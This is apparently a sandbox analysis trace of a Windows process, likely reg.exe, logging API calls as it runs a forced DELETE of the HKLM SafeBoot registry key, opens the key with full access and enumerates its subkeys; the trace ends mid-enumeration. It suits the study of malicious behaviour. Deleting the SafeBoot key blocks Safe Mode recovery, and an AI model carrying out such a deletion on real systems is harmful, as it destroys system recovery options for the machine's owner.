Region: id = 2013 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 2014 start_va = 0x80000 end_va = 0x80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 2015 start_va = 0x1cc0000 end_va = 0x1f8efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2062 start_va = 0x1f90000 end_va = 0x204ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Thread: id = 76 os_tid = 0xccc [0174.495] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2bfecc | out: lpSystemTimeAsFileTime=0x2bfecc*(dwLowDateTime=0x148742a0, dwHighDateTime=0x1da9885)) [0174.495] GetCurrentProcessId () returned 0xcd0 [0174.495] GetCurrentThreadId () returned 0xccc [0174.495] GetTickCount () returned 0x1d1381e [0174.495] QueryPerformanceCounter (in: lpPerformanceCount=0x2bfec4 | out: lpPerformanceCount=0x2bfec4*=3066010255574) returned 1 [0174.496] GetModuleHandleA (lpModuleName=0x0) returned 0xa0000 [0174.496] __set_app_type (_Type=0x1) [0174.496] __p__fmode () returned 0x76e631f4 [0174.496] __p__commode () returned 0x76e631fc [0174.497] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xad4f9) returned 0x0 [0174.497] __wgetmainargs (in: _Argc=0xaf030, _Argv=0xaf038, _Env=0xaf034, _DoWildCard=0, _StartInfo=0xaf010 | out: _Argc=0xaf030, _Argv=0xaf038, _Env=0xaf034) returned 0 [0174.498] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="DELETE", cchCount1=-1, lpString2="QUERY", cchCount2=-1) returned 1 [0174.523] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="DELETE", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 3 [0174.524] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="DELETE", cchCount1=-1, lpString2="DELETE", cchCount2=-1) returned 2 [0174.524] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", phkResult=0x2bfe4c | out: phkResult=0x2bfe4c*=0x0) returned 0x2 [0174.525] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="DELETE", cchCount1=-1, lpString2="DELETE", cchCount2=-1) returned 2 [0174.525] lstrlenW (lpString="-?|/?|-h|/h") returned 11 [0174.525] GetProcessHeap () returned 0x4a0000 [0174.525] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x10) returned 0x4af060 [0174.525] lstrlenW (lpString="") returned 0 [0174.525] GetProcessHeap () returned 0x4a0000 [0174.525] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x2) returned 0x4b3bb8 [0174.525] GetProcessHeap () returned 0x4a0000 [0174.525] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b3a18 [0174.526] GetProcessHeap () returned 0x4a0000 [0174.526] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x10) returned 0x4af078 [0174.526] GetProcessHeap () returned 0x4a0000 [0174.526] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b3a38 [0174.526] GetProcessHeap () returned 0x4a0000 [0174.526] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b3a58 [0174.526] GetProcessHeap () returned 0x4a0000 [0174.526] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b3a78 [0174.526] GetProcessHeap () returned 0x4a0000 [0174.526] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b3a98 [0174.526] GetProcessHeap () returned 0x4a0000 [0174.526] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x10) returned 0x4af090 [0174.526] GetProcessHeap () returned 0x4a0000 [0174.526] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b4db8 [0174.527] GetProcessHeap () returned 0x4a0000 [0174.527] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b4dd8 [0174.527] GetProcessHeap () returned 0x4a0000 [0174.527] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b4df8 [0174.527] GetProcessHeap () returned 0x4a0000 [0174.527] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b4e18 [0174.527] GetProcessHeap () returned 0x4a0000 [0174.527] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x10) returned 0x4af0a8 [0174.527] GetProcessHeap () returned 0x4a0000 [0174.527] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b4e38 [0174.527] GetProcessHeap () returned 0x4a0000 [0174.527] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b4e58 [0174.527] GetProcessHeap () returned 0x4a0000 [0174.527] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b4e78 [0174.528] GetProcessHeap () returned 0x4a0000 [0174.528] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b4e98 [0174.528] SetThreadUILanguage (LangId=0x0) returned 0x409 [0174.528] GetProcessHeap () returned 0x4a0000 [0174.528] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x10) returned 0x4af0c0 [0174.529] _memicmp (_Buf1=0x4af0c0, _Buf2=0xa1318, _Size=0x7) returned 0 [0174.529] GetProcessHeap () returned 0x4a0000 [0174.529] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x1e) returned 0x4b3f78 [0174.529] lstrlenW (lpString="HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot") returned 46 [0174.529] GetProcessHeap () returned 0x4a0000 [0174.529] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x10) returned 0x4af0d8 [0174.529] _memicmp (_Buf1=0x4af0d8, _Buf2=0xa1318, _Size=0x7) returned 0 [0174.529] GetProcessHeap () returned 0x4a0000 [0174.529] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x64) returned 0x4b5038 [0174.530] _vsnwprintf (in: _Buffer=0x4b3f78, _BufferCount=0xe, _Format="|%s|", _ArgList=0x2bfda4 | out: _Buffer="|-?|/?|-h|/h|") returned 13 [0174.530] _vsnwprintf (in: _Buffer=0x4b5038, _BufferCount=0x31, _Format="|%s|", _ArgList=0x2bfda4 | out: _Buffer="|HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot|") returned 48 [0174.530] lstrlenW (lpString="|-?|/?|-h|/h|") returned 13 [0174.530] lstrlenW (lpString="|HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot|") returned 48 [0174.530] SetLastError (dwErrCode=0x490) [0174.530] lstrlenW (lpString="HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot") returned 46 [0174.530] GetProcessHeap () returned 0x4a0000 [0174.530] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x5e) returned 0x4b50a8 [0174.530] lstrlenW (lpString="HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot") returned 46 [0174.530] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0174.530] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0174.530] StrChrW (lpStart=" \x09", wMatch=0x4b) returned 0x0 [0174.530] StrChrW (lpStart=" \x09", wMatch=0x4c) returned 0x0 [0174.530] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0174.531] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0174.531] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0174.531] StrChrW (lpStart=" \x09", wMatch=0x59) returned 0x0 [0174.531] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0174.531] StrChrW (lpStart=" \x09", wMatch=0x54) returned 0x0 [0174.531] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0174.531] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0174.531] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0174.531] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0174.531] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0174.531] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0174.531] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0174.531] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0174.531] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0174.531] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0174.531] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0174.532] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0174.532] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0174.532] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0174.532] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0174.532] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0174.532] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0174.532] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0174.532] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0174.532] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0174.532] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0174.532] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0174.532] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0174.532] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0174.532] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0174.533] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0174.533] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0174.533] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0174.537] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0174.537] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0174.537] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0174.537] StrChrW (lpStart=" \x09", wMatch=0x66) returned 0x0 [0174.537] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0174.537] StrChrW (lpStart=" \x09", wMatch=0x42) returned 0x0 [0174.537] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0174.537] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0174.538] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0174.538] lstrlenW (lpString="HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot") returned 46 [0174.538] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot", cchCount1=2, lpString2="\\\\", cchCount2=2) returned 3 [0174.538] lstrlenW (lpString="HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot") returned 46 [0174.538] lstrlenW (lpString="HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot") returned 46 [0174.538] StrChrIW (lpStart="HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot", wMatch=0x5c) returned="\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot" [0174.540] lstrlenW (lpString="HKEY_CURRENT_CONFIG") returned 19 [0174.540] GetProcessHeap () returned 0x4a0000 [0174.540] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x28) returned 0x4b5238 [0174.540] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKCU", cchCount2=-1) returned 3 [0174.540] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKEY_CURRENT_USER", cchCount2=-1) returned 3 [0174.540] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKCR", cchCount2=-1) returned 3 [0174.540] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKEY_CLASSES_ROOT", cchCount2=-1) returned 3 [0174.540] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKCC", cchCount2=-1) returned 3 [0174.541] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKEY_CURRENT_CONFIG", cchCount2=-1) returned 3 [0174.541] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKLM", cchCount2=-1) returned 2 [0174.541] lstrlenW (lpString="SYSTEM\\CurrentControlSet\\Control\\SafeBoot") returned 41 [0174.541] lstrlenW (lpString="SYSTEM\\CurrentControlSet\\Control\\SafeBoot") returned 41 [0174.541] lstrlenW (lpString="SYSTEM\\CurrentControlSet\\Control\\SafeBoot") returned 41 [0174.541] StrChrIW (lpStart="SYSTEM\\CurrentControlSet\\Control\\SafeBoot", wMatch=0x5c) returned="\\CurrentControlSet\\Control\\SafeBoot" [0174.541] lstrlenW (lpString="SYSTEM\\CurrentControlSet\\Control\\SafeBoot") returned 41 [0174.541] StrChrIW (lpStart="CurrentControlSet\\Control\\SafeBoot", wMatch=0x5c) returned="\\Control\\SafeBoot" [0174.541] lstrlenW (lpString="SYSTEM\\CurrentControlSet\\Control\\SafeBoot") returned 41 [0174.541] StrChrIW (lpStart="Control\\SafeBoot", wMatch=0x5c) returned="\\SafeBoot" [0174.541] lstrlenW (lpString="SYSTEM\\CurrentControlSet\\Control\\SafeBoot") returned 41 [0174.541] StrChrIW (lpStart="SafeBoot", wMatch=0x5c) returned 0x0 [0174.541] SetLastError (dwErrCode=0x490) [0174.541] lstrlenW (lpString="SYSTEM\\CurrentControlSet\\Control\\SafeBoot") returned 41 [0174.542] SetLastError (dwErrCode=0x0) [0174.542] lstrlenW (lpString="SYSTEM\\CurrentControlSet\\Control\\SafeBoot") returned 41 [0174.542] GetProcessHeap () returned 0x4a0000 [0174.542] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x54) returned 0x4b5268 [0174.542] GetProcessHeap () returned 0x4a0000 [0174.542] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x80) returned 0x4b52c8 [0174.542] GetProcessHeap () returned 0x4a0000 [0174.542] GetProcessHeap () returned 0x4a0000 [0174.542] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5238) returned 1 [0174.542] GetProcessHeap () returned 0x4a0000 [0174.542] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5238) returned 0x28 [0174.543] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5238 | out: hHeap=0x4a0000) returned 1 [0174.543] GetProcessHeap () returned 0x4a0000 [0174.543] GetProcessHeap () returned 0x4a0000 [0174.543] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b50a8) returned 1 [0174.543] GetProcessHeap () returned 0x4a0000 [0174.543] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b50a8) returned 0x5e [0174.543] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b50a8 | out: hHeap=0x4a0000) returned 1 [0174.543] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0174.543] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0174.543] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/va", cchCount2=-1) returned 1 [0174.543] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/f", cchCount2=-1) returned 2 [0174.543] SetLastError (dwErrCode=0x0) [0174.544] GetProcessHeap () returned 0x4a0000 [0174.544] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5368 [0174.544] GetProcessHeap () returned 0x4a0000 [0174.544] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5388 [0174.544] GetProcessHeap () returned 0x4a0000 [0174.544] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x10) returned 0x4af0f0 [0174.544] _memicmp (_Buf1=0x4af0f0, _Buf2=0xa1318, _Size=0x7) returned 0 [0174.544] GetProcessHeap () returned 0x4a0000 [0174.544] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x200) returned 0x4b5b50 [0174.545] LoadStringW (in: hInstance=0x0, uID=0xc9, lpBuffer=0x4b5b50, cchBufferMax=256 | out: lpBuffer="Permanently delete the registry key %s (Yes/No)? ") returned 0x31 [0174.545] lstrlenW (lpString="Permanently delete the registry key %s (Yes/No)? ") returned 49 [0174.545] GetProcessHeap () returned 0x4a0000 [0174.545] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x64) returned 0x4b5d58 [0174.545] _memicmp (_Buf1=0x4af0f0, _Buf2=0xa1318, _Size=0x7) returned 0 [0174.545] LoadStringW (in: hInstance=0x0, uID=0xce, lpBuffer=0x4b5b50, cchBufferMax=256 | out: lpBuffer="YNA") returned 0x3 [0174.545] lstrlenW (lpString="YNA") returned 3 [0174.546] GetProcessHeap () returned 0x4a0000 [0174.546] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x8) returned 0x4b4ef0 [0174.546] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Control\\SafeBoot", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfde0 | out: phkResult=0x2bfde0*=0x74) returned 0x0 [0174.546] RegQueryInfoKeyW (in: hKey=0x74, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x2bfdc8, lpcbMaxSubKeyLen=0x2bfddc, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x2bfdc8*=0x2, lpcbMaxSubKeyLen=0x2bfddc, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.546] GetProcessHeap () returned 0x4a0000 [0174.547] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x10) returned 0x4af108 [0174.547] GetProcessHeap () returned 0x4a0000 [0174.547] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x22) returned 0x4b5238 [0174.547] RegEnumKeyExW (in: hKey=0x74, dwIndex=0x0, lpName=0x4b5238, lpcchName=0x2bfdd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Minimal", lpcchName=0x2bfdd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.547] lstrlenW (lpString="Minimal") returned 7 [0174.547] GetProcessHeap () returned 0x4a0000 [0174.547] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x10) returned 0x4af120 [0174.547] GetProcessHeap () returned 0x4a0000 [0174.547] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b53a8 [0174.547] RegEnumKeyExW (in: hKey=0x74, dwIndex=0x1, lpName=0x4b5238, lpcchName=0x2bfdd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Network", lpcchName=0x2bfdd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.547] lstrlenW (lpString="Network") returned 7 [0174.547] GetProcessHeap () returned 0x4a0000 [0174.548] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x10) returned 0x4af138 [0174.548] GetProcessHeap () returned 0x4a0000 [0174.548] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b53c8 [0174.548] GetProcessHeap () returned 0x4a0000 [0174.548] GetProcessHeap () returned 0x4a0000 [0174.548] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5238) returned 1 [0174.548] GetProcessHeap () returned 0x4a0000 [0174.548] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5238) returned 0x22 [0174.548] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5238 | out: hHeap=0x4a0000) returned 1 [0174.548] RegOpenKeyExW (in: hKey=0x74, lpSubKey="Minimal", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd9c | out: phkResult=0x2bfd9c*=0x78) returned 0x0 [0174.819] RegQueryInfoKeyW (in: hKey=0x78, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x2bfd84, lpcbMaxSubKeyLen=0x2bfd98, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x2bfd84*=0x38, lpcbMaxSubKeyLen=0x2bfd98, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.819] GetProcessHeap () returned 0x4a0000 [0174.819] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x10) returned 0x4b5de0 [0174.820] GetProcessHeap () returned 0x4a0000 [0174.820] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x9e) returned 0x4b61c8 [0174.820] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x0, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="AppInfo", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.820] lstrlenW (lpString="AppInfo") returned 7 [0174.820] GetProcessHeap () returned 0x4a0000 [0174.820] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x10) returned 0x4b5df8 [0174.820] GetProcessHeap () returned 0x4a0000 [0174.820] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b53e8 [0174.820] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x1, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="AppMgmt", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.820] lstrlenW (lpString="AppMgmt") returned 7 [0174.820] GetProcessHeap () returned 0x4a0000 [0174.820] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x10) returned 0x4b5e10 [0174.820] GetProcessHeap () returned 0x4a0000 [0174.821] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5408 [0174.821] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x2, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Base", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.821] lstrlenW (lpString="Base") returned 4 [0174.821] GetProcessHeap () returned 0x4a0000 [0174.821] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0xa) returned 0x4b5e28 [0174.821] GetProcessHeap () returned 0x4a0000 [0174.821] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5428 [0174.821] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x3, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Boot Bus Extender", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.821] lstrlenW (lpString="Boot Bus Extender") returned 17 [0174.821] GetProcessHeap () returned 0x4a0000 [0174.821] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x24) returned 0x4b5238 [0174.821] GetProcessHeap () returned 0x4a0000 [0174.821] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5448 [0174.821] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x4, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Boot file system", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.822] lstrlenW (lpString="Boot file system") returned 16 [0174.822] GetProcessHeap () returned 0x4a0000 [0174.822] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x22) returned 0x4b50a8 [0174.822] GetProcessHeap () returned 0x4a0000 [0174.822] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5468 [0174.822] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x5, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="CryptSvc", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.822] lstrlenW (lpString="CryptSvc") returned 8 [0174.822] GetProcessHeap () returned 0x4a0000 [0174.822] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x12) returned 0x4b5488 [0174.822] GetProcessHeap () returned 0x4a0000 [0174.822] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b54a8 [0174.823] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x6, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="DcomLaunch", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.823] lstrlenW (lpString="DcomLaunch") returned 10 [0174.823] GetProcessHeap () returned 0x4a0000 [0174.823] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x16) returned 0x4b54c8 [0174.823] GetProcessHeap () returned 0x4a0000 [0174.823] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b54e8 [0174.823] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x7, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="EFS", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.823] lstrlenW (lpString="EFS") returned 3 [0174.823] GetProcessHeap () returned 0x4a0000 [0174.823] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x8) returned 0x4b3ab8 [0174.823] GetProcessHeap () returned 0x4a0000 [0174.823] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5508 [0174.823] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x8, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="EventLog", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.824] lstrlenW (lpString="EventLog") returned 8 [0174.824] GetProcessHeap () returned 0x4a0000 [0174.824] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x12) returned 0x4b5528 [0174.824] GetProcessHeap () returned 0x4a0000 [0174.824] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5548 [0174.824] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x9, lpName=0x4b61c8, lpcchName=0x2bfd90, 